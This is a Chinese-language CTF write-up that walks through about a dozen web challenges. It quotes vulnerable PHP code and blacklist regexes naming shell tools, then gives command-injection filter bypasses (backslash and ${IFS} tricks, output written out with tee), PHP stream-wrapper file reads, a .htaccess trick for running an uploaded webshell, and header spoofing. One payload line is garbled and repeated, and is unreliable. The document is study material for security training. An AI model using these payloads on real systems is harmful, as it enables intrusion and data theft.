NSS-DAY17 2025SWPU-NSSCTF

babyRCE

题目：

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

使用斜线绕过：?rce=ca\t${IFS}fla\g.php

使用grep匹配：?rce=grep${IFS}f${IFS}fla?.php

使用@绕过：'''?rce=t@绕过：```?rce=t@绕过：'''?rce=t@a@c@c@c{IFS}f@l@l@l@a@g@g@g@.@p@p@p@h$@p```

finalrce

题目：

 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

exec()函数：exec(string KaTeX parse error: Expected 'EOF', got '&' at position 16: command, array &̲output = null, int &$result_code = null): string|false

exec() 执行 command 参数所指定的命令。如果提供了 output 参数， 那么会用命令执行的输出填充此数组， 每行输出填充数组中的一个元素。如果同时提供 output 和 result_code 参数，命令执行后的返回状态会被写入到result_code。

返回命令执行结果的最后一行内容。

因此直接传入命令是没有回显的，即无回显RCE

使用tee命令

tee命令用于读取标准输入的数据，并将其内容输出成文件。

tee指令会从标准输入设备读取数据，将其内容输出到标准输出设备，同时保存成文件。

payload：

基本结构为：command | tee file.txt
因为题目没过滤 | , 这是一个管道命令符号，用于将前一个命令的输出作为后一个命令的输入
那么这句话的意思就是将command我们需要执行的命令的输出作为tee命令的输入，tee命令再将其存到file.txt里

绕过ls：/?url=l\s / |tee 1.txt

这里这个转义字符 \ 是用于在外壳程序中转移控制字符，使控制字符成为字面量，而失去其在外壳程序中控制符的含义（官方解释）

看到flag的位置了，且没过滤tac，于是直接读取：
/?url=tac /flllll\aaaaaaggggggg |tee 2.txt

注意这里la之间也需要绕过

再访问2.txt得到flag：

PseudoProtocols

题目：

尝试伪协议访问隐藏文件php://filter/convert.base64-encode/resource=hint.php

访问test2222222222222.php：

<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

读取a指定的文件内容并比较，使用data协议传输?a=data://text/plain,I want flag

easyupload1.0

直接上传一句话木马

不对，看看是不是在环境里面

easyupload2.0

后缀php被限制了，使用其他可解析的后缀例如phtml

easyupload3.0

直接上传木马被限了

根据网页标题提示要配合其他文件，联想到时.htaccess绕过

先上传.htaccess文件

AddType application/x-httpd-php .jpg

再上传木马图片

在html下存在flag.php文件

gift_F12

查看源代码

ez_ez_php

题目：

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

使用php伪协议读取文件
?file=php://filter/convert.base64-encode/resource=flag.php
提示在flag文件里?file=php://filter/convert.base64-encode/resource=flag

jicao

题目：

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

json是数对的形式

Do_you_know_http

抓包，修改user-agent

访问a.php
要求必须要本地访问，添加XFF

访问secretttt.php

WebFTP

直接访问是一个登录页面

爆破了很久都没成功，收集一下其他信息

扫描目录发现存在phpinfo.php页面

FLAG隐藏在环境变量中

导弹迷踪

是一个JS游戏

先定位main

查看game
得到FLAG{y0u_w1n_th1s_!!!}